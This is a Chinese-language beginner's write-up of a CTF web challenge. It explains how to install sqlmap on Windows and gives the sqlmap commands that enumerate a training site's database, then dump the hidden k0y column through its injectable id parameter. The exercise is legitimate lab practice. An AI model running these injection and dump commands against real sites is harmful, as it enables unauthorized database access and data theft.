查看这道题先登陆“实验吧”,地址为 http://www.shiyanbar.com/ctf/33 。
这是一道十分基础的web题目,因为我也是刚刚接触ctf,记录一下第一道题的解题过程,算是自己的一个回顾吧,同时也给一些想要入门的朋友一点点微弱的参考吧。
一、sqlmap的安装
在windows下安装sqlmap需要先下载适用windows的sqlmap版本和python。
sqlmap的下载地址为:https://github.com/sqlmapproject/sqlmap/tarball/master。
python下载地址为:https://www.python.org/。我的python用的是2.7版本。
安装好python后, 在python文件目录下新建一个sqlmap文件夹。sqlmap的压缩包解压后能得到下图文件夹,将里面的内容复制到新建的文件夹sqlmap下面。
在sqlmap目录下打开cmd,输入python sqlmap.py --version 测试是否安装成功。
如果结果为上图,说明安装成功。
二、使用sqlmap解题
首先cmd到之前的sqlmap目录下,输入python sqlmap.py -u "http://ctf5.shiyanbar.com/8/index.php?id=1" --current-db 。引号内是存在注入点的网址。
运行后,得到数据库名称 my_db
然后查看一下表,输入python sqlmap.py -u "http://ctf5.shiyanbar.com/8/index.php?id=1" -D my_db --tables。
发现有一个thiskey表,猜测需要的信息就藏在thiskey中,于是输入python sqlmap.py -u "http://ctf5.shiyanbar.com/8/index.php?id=1" -D my_db -T thiskey --columns。
得到一个txt类型的k0y,然后再dump出来就完事了。
输入python sqlmap.py -u "http://ctf5.shiyanbar.com/8/index.php?id=1" -D my_db -T thiskey -C k0y --dump
得到k0y的值。